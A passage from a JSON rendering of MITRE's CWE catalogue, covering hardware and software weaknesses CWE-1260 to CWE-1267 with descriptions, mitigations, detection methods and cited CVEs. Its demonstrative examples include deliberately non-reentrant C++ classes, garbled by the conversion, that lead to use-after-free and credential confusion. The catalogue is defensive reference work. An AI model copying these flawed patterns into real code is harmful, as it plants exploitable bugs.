region","Access_policy[31:0]: specifies what types of software can access a region and which actions are allowed"]},{"xhtml:li":["Access_policy.read_np: if set to one, allows reads from Non_privileged_SW","Access_policy.write_np: if set to one, allows writes from Non_privileged_SW","Access_policy.execute_np: if set to one, allows code execution by Non_privileged_SW","Access_policy.read_p: if set to one, allows reads from Privileged_SW","Access_policy.write_p: if set to one, allows writes from Privileged_SW","Access_policy.execute_p: if set to one, allows code execution by Privileged_SW"]},{"xhtml:li":["Region_0 &amp; Region_1: registers are programmable by Privileged_SW","Region_2: registers are programmable by Non_privileged_SW"]}]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"Non_privileged_SW can program the Address_range register for Region_2 so that its address overlaps with the ranges defined by Region_0 or Region_1. Using this capability, it is possible for Non_privileged_SW to block any memory region from being accessed by Privileged_SW, i.e., Region_0 and Region_1."},{"#text":"Ensure that software accesses to memory regions are only permitted if all three filters permit access. Additionally, the scheme could define a memory region priority to ensure that Region_2 (the memory region defined by Non_privileged_SW) cannot overlap Region_0 or Region_1 (which are used by Privileged_SW).","attr":{"@_Nature":"good"}}],"Body_Text":"This design could be improved in several ways."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-7096","Description":"virtualization product allows compromise of hardware product by accessing certain remapping registers.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7096"},{"Reference":"[REF-1100]","Description":"processor design flaw allows ring 0 code to access more privileged rings by causing a register window to overlap a range of protected system RAM [REF-1100]","Link":"https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1100"}}},"Notes":{"Note":{"#text":"As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":[{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"suggested content improvements"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"suggested observed examples"}]}},"1261":{"attr":{"@_ID":"1261","@_Name":"Improper Handling of Single Event Upsets","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware logic does not effectively handle when single-event upsets (SEUs) occur.","Extended_Description":{"xhtml:p":"Technology trends such as CMOS-transistor down-sizing, use of \\n            new materials, and system-on-chip architectures continue to increase the \\n            sensitivity of systems to soft errors. These errors are random, and \\n            their causes might be internal (e.g., interconnect coupling) or external \\n            (e.g., cosmic radiation). These soft errors are not permanent in nature \\n            and cause temporary bit flips known as single-event upsets (SEUs). \\n            SEUs are induced errors in circuits caused when charged particles lose \\n            energy by ionizing the medium through which they pass, leaving behind a \\n            wake of electron-hole pairs that cause temporary failures. If these \\n            failures occur in security-sensitive modules in a chip, it might \\n            compromise the security guarantees of the chip. For instance, these \\n            temporary failures could be bit flips that change the privilege of\\n\\t    a regular user to root."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1254","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Availability","Access Control"],"Impact":["DoS: Crash, Exit, or Restart","DoS: Instability","Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Implement triple-modular redundancy around security-sensitive modules."}},{"Phase":"Architecture and Design","Description":{"xhtml:p":"SEUs mostly affect SRAMs.  For SRAMs storing security-critical data, implement Error-Correcting-Codes (ECC) and Address Interleaving."}}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This is an example from [REF-1089].  See the reference for full details of this issue.","Body_Text":"Parity is error detecting but not error correcting.","Example_Code":[{"#text":"Due to single-event upsets, bits are flipped in memories.  As a result, memory-parity checks fail, which results in restart and a temporary denial of service of two to three minutes.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Using error-correcting codes could have avoided the restart caused by SEUs.","attr":{"@_Nature":"good","@_Language":"Other"}}]},{"Intro_Text":"In 2016, a security researcher, who was also a patient using a pacemaker, was on an airplane when a bit flip occurred in the pacemaker, likely due to the higher prevalence of cosmic radiation at such heights. The pacemaker was designed to account for bit flips and went into a default safe mode, which still forced the patient to go to a hospital to get it reset. The bit flip also inadvertently enabled the researcher to access the crash file, perform reverse engineering, and detect a hard-coded key. [REF-1101]"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1086"}},{"attr":{"@_External_Reference_ID":"REF-1087"}},{"attr":{"@_External_Reference_ID":"REF-1088"}},{"attr":{"@_External_Reference_ID":"REF-1089"}},{"attr":{"@_External_Reference_ID":"REF-1090"}},{"attr":{"@_External_Reference_ID":"REF-1091"}},{"attr":{"@_External_Reference_ID":"REF-1101"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"}}},"1262":{"attr":{"@_ID":"1262","@_Name":"Improper Access Control for Register Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers.","Extended_Description":{"xhtml:p":"Software commonly accesses peripherals in a System-on-Chip (SoC) or other device through a memory-mapped register interface. Malicious software could tamper with any security-critical hardware data that is accessible directly or indirectly through the register interface, which could lead to a loss of confidentiality and integrity."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may be exploited if the register interface design does not adequately protect hardware assets from software."},{"Phase":"Implementation","Note":"Mis-implementation of access control policies may inadvertently allow access to hardware assets through the register interface."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Memory","Read Application Data","Modify Memory","Modify Application Data","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Unexpected State","Alter Execution Logic"],"Note":"Confidentiality of hardware assets may be violated if the protected information can be read out by software through the register interface. Registers storing security state, settings, other security-critical data may be corruptible by software without correctly implemented protections."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"This is applicable in the Architecture phase before implementation started. Make sure access policy is specified for the entire memory map. Manual analysis may not ensure the implementation is correct.","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":"Registers controlling hardware should have access control implemented. This access control may be checked manually for correct implementation. Items to check consist of how are trusted parties set, how are trusted parties verified, how are accesses verified, etc. Effectiveness of a manual analysis will vary depending upon how complicated the interface is constructed.","Effectiveness":"Moderate"},{"Method":"Simulation / Emulation","Description":"Functional simulation is applicable during the Implementation Phase. Testcases must be created and executed for memory mapped registers to verify adherence to the access control policy. This method can be effective, since functional verification needs to be performed on the design, and verification for this weakness will be included. There can be difficulty covering the entire memory space during the test.","Effectiveness":"Moderate"},{"Method":"Formal Verification","Description":"Formal verification is applicable during the Implementation phase. Assertions need to be created in order to capture illegal register access scenarios and prove that they cannot occur. Formal methods are exhaustive and can be very effective, but creating the cases for large designs may be complex and difficult.","Effectiveness":"High"},{"Method":"Automated Analysis","Description":"Information flow tracking can be applicable during the Implementation phase. Security sensitive data (assets) - for example, as stored in registers - is automatically tracked over time through the design to verify the data doesn\'t reach illegal destinations that violate the access policies for the memory map. This method can be very effective when used together with simulation and emulation, since detecting violations doesn\'t rely on specific scenarios or data values. This method does rely on simulation and emulation, so testcases must exist in order to use this method.","Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":"Manual documentation review of the system memory map, register specification, and permissions associated with accessing security-relevant functionality exposed via memory-mapped registers.","Effectiveness":"Moderate"},{"Method":"Fuzzing","Description":"Perform penetration testing (either manual or semi-automated with fuzzing) to verify that access control mechanisms such as the memory protection units or on-chip bus firewall settings adequately protect critical hardware registers from software access.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design proper policies for hardware register access from software."},{"Phase":"Implementation","Description":"Ensure that access control policies for register access are implemented in accordance with the specified design."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The register interface provides software access to hardware functionality. This functionality is an attack surface. This attack surface may be used to run untrusted code on the system through the register interface. As an example, cryptographic accelerators require a mechanism for software to select modes of operation and to provide plaintext or ciphertext data to be encrypted or decrypted as well as other functions. This functionality is commonly provided through registers.","Example_Code":[{"#text":"Cryptographic key material stored in registers inside the cryptographic accelerator can be accessed by software.","attr":{"@_Nature":"bad"}},{"#text":"Key material stored in registers should never be accessible to software. Even if software can provide a key, all read-back paths to software should be disabled.","attr":{"@_Nature":"good"}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-2915","Description":"virtualization product does not restrict access to debug and other processor registers in the hardware, allowing a crash of the host or guest OS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2915"},{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2020-12446","Description":"Driver exposes access to Model Specific Register (MSR) registers, allowing admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12446"},{"Reference":"CVE-2015-2150","Description":"Virtualization product does not restrict access to PCI command registers, allowing host crash from the guest.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2150"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"},"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods and observed examples"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-12","Contribution_Comment":"Provided detection methods"}]}},"1263":{"attr":{"@_ID":"1263","@_Name":"Improper Physical Access Control","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas.","Extended_Description":"Sections of a product intended to have restricted access may be inadvertently or intentionally rendered accessible when the implemented physical protections are insufficient. The specific requirements around how robust the design of the physical protection mechanism needs to be depends on the type of product being protected. Selecting the correct physical protection mechanism and properly enforcing it through implementation and manufacturing are critical to the overall physical security of the product.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1191","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1243","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness can arise if design decisions are made that do not align with the intended physical protection of the product"},{"Phase":"Manufacturing","Note":"While the architecture and design phase of the product may have accurately met the intended robustness for product physical protections, this phase may introduce the weakness through errors in physically manufacturing the product."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Specific protection requirements depend strongly on contextual factors including the level of acceptable risk associated with compromise to the product\'s protection mechanism. Designers could incorporate anti-tampering measures that protect against or detect when the product has been tampered with."},{"Phase":"Testing","Description":"The testing phase of the lifecycle should establish a method for determining whether the protection mechanism is sufficient to prevent unauthorized access."},{"Phase":"Manufacturing","Description":"Ensure that all protection mechanisms are fully activated at the time of manufacturing and distribution."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"401"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-05-28"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Physical Protection Mechanism","attr":{"@_Date":"2020-08-20"}}}},"1264":{"attr":{"@_ID":"1264","@_Name":"Hardware Logic with Insecure De-Synchronization between Control and Data Channels","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The hardware logic for error handling and security checks can incorrectly forward data before the security check is complete.","Extended_Description":{"xhtml:p":"Many high-performance on-chip bus protocols and processor data-paths employ separate channels for control and data to increase parallelism and maximize throughput. Bugs in the hardware logic that handle errors and security checks can make it possible for data to be forwarded before the completion of the security checks. If the data can propagate to a location in the hardware observable to an attacker, loss of data confidentiality can occur. \'Meltdown\' is a concrete example of how de-synchronization between data and permissions checking logic can violate confidentiality requirements. Data loaded from a page marked as privileged was returned to the cpu regardless of current privilege level for performance reasons. The assumption was that the cpu could later remove all traces of this data during the handling of the illegal memory access exception, but this assumption was proven false as traces of the secret data were not removed from the microarchitectural state."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"821","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1037","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The weakness can be introduced in the data transfer or bus protocol itself or in the implementation."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Thoroughly verify the data routing logic to ensure that any error handling or security checks effectively block illegal dataflows."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"There are several standard on-chip bus protocols used in modern SoCs to allow communication between components. There are a wide variety of commercially available hardware IP implementing the interconnect logic for these protocols. A bus connects components which initiate/request communications such as processors and DMA controllers (bus masters) with peripherals which respond to requests. In a typical system, the privilege level or security designation of the bus master along with the intended functionality of each peripheral determine the security policy specifying which specific bus masters can access specific peripherals.  This security policy (commonly referred to as a bus firewall) can be enforced using separate IP/logic from the actual interconnect responsible for the data routing.","Example_Code":[{"#text":"The firewall and data routing logic becomes de-synchronized due to a hardware logic bug allowing components that should not be allowed to communicate to share data. For example, consider an SoC with two processors. One is being used as a root of trust and can access a cryptographic key storage peripheral. The other processor (application cpu) may run potentially untrusted code and should not access the key store. If the application cpu can issue a read request to the key store which is not blocked due to de-synchronization of data routing and the bus firewall, disclosure of cryptographic keys is possible.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"All data is correctly buffered inside the interconnect until the firewall has determined that the endpoint is allowed to receive the data.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-5754","Description":"Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"233"}},{"attr":{"@_CAPEC_ID":"663"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-22"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1265":{"attr":{"@_ID":"1265","@_Name":"Unintended Reentrant Invocation of Non-reentrant Code Via Nested Calls","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"During execution of non-reentrant code, the software performs a call that unintentionally produces a nested invocation of the non-reentrant code.","Extended_Description":"In complex software, a single function call may lead to many different possible code paths, some of which may involve deeply nested calls. It may be difficult to foresee all possible code paths that could emanate from a given function call. In some systems, an external actor can manipulate inputs to the system and thereby achieve a wide range of possible control flows. This is frequently of concern in software that executes script from untrusted sources. Examples of such software are web browsers and PDF readers. A weakness is present when one of the possible code paths resulting from a function call alters program state that the original caller assumes to be unchanged during the call.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"663","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"416","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Likelihood":"Unknown","Note":"Exploitation of this weakness can leave the application in an unexpected state and cause variables to be reassigned before the first invocation has completed. This may eventually result in memory corruption or unexpected code execution."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting a system that will execute untrusted code in response to events, consider executing the untrusted event handlers asynchronously (asynchronous message passing) as opposed to executing them synchronously at the time each event fires. The untrusted code should execute at the start of the next iteration of the thread\u2019s message loop. In this way, calls into non-reentrant code are strictly serialized, so that each operation completes fully before the next operation begins. Special attention must be paid to all places where type coercion may result in script execution. Performing all needed coercions at the very beginning of an operation can help reduce the chance of operations executing at unexpected junctures.","Effectiveness":"High"},{"Phase":"Implementation","Description":"Make sure the code (e.g., function or class) in question is reentrant by not leveraging non-local data, not modifying its own code, and not calling other non-reentrant code.","Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The implementation of the Widget class in the following C++ code is an example of code that is not designed to be reentrant. If an invocation of a method of Widget inadvertently produces a second nested invocation of a method of Widget, then data member backgroundImage may unexpectedly change during execution of the outer call.","Example_Code":{"attr":{"@_Language":"C++","@_Nature":"bad"},"xhtml:div":{"#text":"class Widget{}class Image{}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"Image* backgroundImage;","attr":{"@_style":"margin-left:10px;"}},{"#text":"void click(){}void changeBackgroundImage(Image* newImage){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"if (backgroundImage){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"backgroundImage-&gt;click();","attr":{"@_style":"margin-left:10px;"}}},{"#text":"if (backgroundImage){}backgroundImage = newImage;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"delete backgroundImage;","attr":{"@_style":"margin-left:10px;"}}}]}],"xhtml:br":""},{"#text":"public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"void click(){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"scriptEngine-&gt;fireOnImageClick();/* perform some operations using \u201cthis\u201d pointer */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}]}},"Body_Text":"Looking closer at this example, Widget::click() calls backgroundImage-&gt;click(), which in turn calls scriptEngine-&gt;fireOnImageClick(). The code within fireOnImageClick() invokes the appropriate script handler routine as defined by the document being rendered. In this scenario this script routine is supplied by an adversary and this malicious script makes a call to Widget::changeBackgroundImage(), deleting the Image object pointed to by backgroundImage. When control returns to Image::click, the function\u2019s \\"backgroundImage \\"this\\" pointer (which is the former value of backgroundImage) is a dangling pointer. The root of this weakness is that while one operation on Widget (click) is in the midst of executing, a second operation on the Widget object may be invoked (in this case, the second invocation is a call to different method, namely changeBackgroundImage) that modifies the non-local variable."},{"Intro_Text":"This is another example of C++ code that is not designed to be reentrant.","Example_Code":{"attr":{"@_Language":"C++","@_Nature":"bad"},"xhtml:div":{"#text":"class Request{}","xhtml:br":"","xhtml:div":{"#text":"private:public:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"std::string uri;/* ... */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"void setup(ScriptObject* _uri){}void send(ScriptObject* _data){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:div":[{"#text":"this-&gt;uri = scriptEngine-&gt;coerceToString(_uri);/* ... */","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"Credentials credentials = GetCredentials(uri);std::string data = scriptEngine-&gt;coerceToString(_data);doSend(uri, credentials, data);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}]}],"xhtml:br":""}}},"Body_Text":"The expected order of operations is a call to Request::setup(), followed by a call to Request::send(). Request::send() calls scriptEngine-&gt;coerceToString(_data) to coerce a script-provided parameter into a string. This operation may produce script execution. For example, if the script language is ECMAScript, arbitrary script execution may result if _data is an adversary-supplied ECMAScript object having a custom toString method. If the adversary\'s script makes a new call to Request::setup, then when control returns to Request::send, the field uri and the local variable credentials will no longer be consistent with one another. As a result, credentials for one resource will be shared improperly with a different resource. The root of this weakness is that while one operation on Request (send) is in the midst of executing, a second operation may be invoked (setup)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-1772","Description":"In this vulnerability, by registering a malicious onerror handler, an adversary can produce unexpected re-entrance of a CDOMRange object. [REF-1098]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1772"},{"Reference":"CVE-2018-8174","Description":"This CVE covers several vulnerable scenarios enabled by abuse of the Class_Terminate feature in Microsoft VBScript. In one scenario, Class_Terminate is used to produce an undesirable re-entrance of ScriptingDictionary during execution of that object\u2019s destructor. In another scenario, a vulnerable condition results from a recursive entrance of a property setter method. This recursive invocation produces a second, spurious call to the Release method of a reference-counted object, causing a UAF when that object is freed prematurely. This vulnerability pattern has been popularized as \u201cDouble Kill\u201d. [REF-1099]","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1098"}},{"attr":{"@_External_Reference_ID":"REF-1099"}}]},"Content_History":{"Submission":{"Submission_Name":"Simon Zuckerbraun","Submission_Organization":"Trend Micro","Submission_Date":"2018-12-20"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"}}},"1266":{"attr":{"@_ID":"1266","@_Name":"Improper Scrubbing of Sensitive Data from Decommissioned Device","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not properly provide a capability for the product administrator to remove sensitive data at the time the product is decommissioned.  A scrubbing capability could be missing, insufficient, or incorrect.","Extended_Description":{"xhtml:p":"When a product is decommissioned - i.e., taken out of service - best practices or regulatory requirements may require the administrator to remove or overwrite sensitive data first, i.e. \\"scrubbing.\\"  Improper scrubbing of sensitive data from a decommissioned device leaves that data vulnerable to acquisition by a malicious actor. Sensitive data may include, but is not limited to, device/manufacturer proprietary information, user/device credentials, network configurations, and other forms of sensitive data."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"404","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Policy"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Memory"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Functionality to completely scrub data from a product at the conclusion of its lifecycle should be part of the design phase. Trying to add this function on top of an existing architecture could lead to incomplete removal of sensitive information/data."}},{"Phase":"Policy","Description":{"xhtml:p":"The manufacturer should describe the location(s) where sensitive data is stored and the policies and procedures for its removal. This information may be conveyed, for example, in an Administrators Guide or a Statement of Volatility."}},{"Phase":"Implementation","Description":{"xhtml:p":"If the capability to wipe sensitive data isn\'t built-in, the manufacturer may need to provide a utility to scrub sensitive data from storage if that data is located in a place which is non-accessible by the administrator. One example of this could be when sensitive data is stored on an EEPROM for which there is no user/admin interface provided by the system."}}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}},{"attr":{"@_CAPEC_ID":"546"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1080"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Paul A. Wortman","Submission_Organization":"Wells Fargo","Submission_Date":"2020-05-28"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"}}},"1267":{"attr":{"@_ID":"1267","@_Name":"Policy Uses Obsolete Encoding","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an obsolete encoding mechanism to implement access controls.","Extended_Description":{"xhtml:p":"Within a System-On-a-Chip (SoC), various circuits and hardware engines generate transactions for the purpose of accessing (read/write) assets or performing various actions 